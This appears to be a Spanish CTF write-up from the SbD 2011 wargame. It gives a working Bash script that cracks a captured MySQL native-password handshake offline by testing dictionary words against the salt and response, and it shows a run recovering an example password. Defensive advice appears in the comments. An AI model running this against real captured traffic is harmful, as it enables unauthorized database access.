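En el reto 'networking 2' del wargame de SbD 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos MySQL. De esa captura se obtienen el salt que envía el servidor y la respuesta que devuelve el cliente, y con ambos se puede comprobar un diccionario de contraseñas sin volver a conectar al servidor.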
En este ejemplo utilizaremos un salt y una contraseña distintos de los del reto.
Salt: x8MXV%QLgDZ{ypGN6^Y#
Contraseña (la respuesta de 20 bytes capturada en el handshake, en hexadecimal; no la contraseña en claro): d648fcba578670abf1ec93b0dce1b41f681dc71c
Ejecución
#cat diccionario.txt
hack
tracking
wargame
#cat mysql_sha1_salt.sh
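#!/bin/bash
#
# mysql_sha1_salt.sh - check the words of a dictionary file against a captured
# mysql_native_password handshake response.
#
# For a server salt and a password, the client response computed here is
#   SHA1(password) XOR SHA1(salt + SHA1(SHA1(password)))
# with the inner digests used as raw bytes, not as hex text.
#
# Usage: ./mysql_sha1_salt.sh SALT PASSWORD_FILE CAPTURED_RESPONSE
#   SALT               salt taken from the capture
#   PASSWORD_FILE      one candidate password per line
#   CAPTURED_RESPONSE  40 hex digits taken from the capture
#
# Defensive takeaway: salt and response travel in the clear unless the
# connection uses TLS, and together they are enough to test guesses offline.
# Require TLS for MySQL connections, prefer caching_sha2_password, and use
# passwords that do not appear in dictionaries.

# Without pipefail a failing sha1sum would be hidden by the trailing cut.
set -o pipefail

# Print the SHA-1 of standard input as 40 lowercase hex digits.
function sha1_stdin {
  sha1sum | cut -d ' ' -f1
}

# Print the SHA-1 of the literal string $1 as 40 lowercase hex digits.
function sha1 {
  printf '%s' "$1" | sha1_stdin
}

# Write the raw bytes encoded by the hex string $1 to stdout.
# The output can contain NUL, whitespace and newline bytes, so it must be piped
# to its consumer and never captured in a shell variable.
# Returns 1 if $1 is not an even-length hex string.
function hex2ascii {
  local hex=$1 i
  local even_hex='^([0-9A-Fa-f]{2})*$'
  if [[ ! $hex =~ $even_hex ]]; then
    printf 'hex2ascii: not an even-length hex string\n' >&2
    return 1
  fi
  for ((i = 0; i < ${#hex}; i += 2)); do
    # %b expands the \xHH escape; the printf builtin avoids an external tool.
    printf '%b' "\\x${hex:i:2}"
  done
}

# XOR the first $1 hex digits of $2 and $3 digit by digit; print the result.
# Returns 1 if either string is not hex or is shorter than $1.
function xor {
  local length=$1 string_a=$2 string_b=$3
  local i nibble xored=''
  local hex_only='^[0-9A-Fa-f]+$'
  # Validate before the arithmetic below so only hex digits are ever evaluated.
  if [[ ! $string_a =~ $hex_only || ! $string_b =~ $hex_only ]] ||
    ((${#string_a} < length || ${#string_b} < length)); then
    printf 'xor: operands must be hex strings of at least %s digits\n' \
      "$length" >&2
    return 1
  fi
  for ((i = 0; i < length; i++)); do
    printf -v nibble '%x' "$((0x${string_a:i:1} ^ 0x${string_b:i:1}))"
    xored+=$nibble
  done
  printf '%s' "$xored"
}

# Print the 40-hex-digit response for salt $1 and candidate password $2.
function mysql_scramble {
  local salt=$1 secret=$2
  local hash_stage_1 hash_stage_2 hash_stage_3
  hash_stage_1=$(sha1 "$secret") || return
  # Raw digests go straight through a pipe: a shell variable would drop NUL
  # bytes and trailing newlines, and an unquoted expansion would split the
  # digest at any space, tab or newline byte.
  hash_stage_2=$(hex2ascii "$hash_stage_1" | sha1_stdin) || return
  hash_stage_3=$({
    printf '%s' "$salt"
    hex2ascii "$hash_stage_2"
  } | sha1_stdin) || return
  xor 40 "$hash_stage_1" "$hash_stage_3"
}

# Read PASSWORD_FILE line by line and print "<word> --> <response>" for every
# word whose computed response equals CAPTURED_RESPONSE.
# Returns 2 on a usage error, 1 if the file cannot be read.
function main {
  if (($# != 3)); then
    printf 'Usage: %s SALT PASSWORD_FILE CAPTURED_RESPONSE\n' "${0##*/}" >&2
    return 2
  fi
  local salt=$1 password_file=$2 captured_password=$3
  local secret generated_password wanted
  local hex40='^[0-9A-Fa-f]{40}$'

  if [[ ! $captured_password =~ $hex40 ]]; then
    printf 'error: the captured response must be 40 hex digits\n' >&2
    return 2
  fi
  if [[ ! -r $password_file ]]; then
    printf 'error: cannot read %s\n' "$password_file" >&2
    return 1
  fi
  # sha1sum prints lowercase, so compare against a lowercase copy.
  wanted=$(printf '%s' "$captured_password" | tr 'A-F' 'a-f') || return

  # IFS= and -r keep each line exactly as written (spaces, backslashes); the
  # extra test handles a last line without a trailing newline.
  while IFS= read -r secret || [[ -n $secret ]]; do
    generated_password=$(mysql_scramble "$salt" "$secret") || return
    if [[ $generated_password == "$wanted" ]]; then
      printf '%s --> %s\n' "$secret" "$captured_password"
    fi
  done < "$password_file"
}

# main is the last command, so its status becomes the script's exit status.
main "$@"

#./mysql_sha1_salt.sh 'x8MXV%QLgDZ{ypGN6^Y#' diccionario.txt d648fcba578670abf1ec93b0dce1b41f681dc71c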
tracking --> d648fcba578670abf1ec93b0dce1b41f681dc71c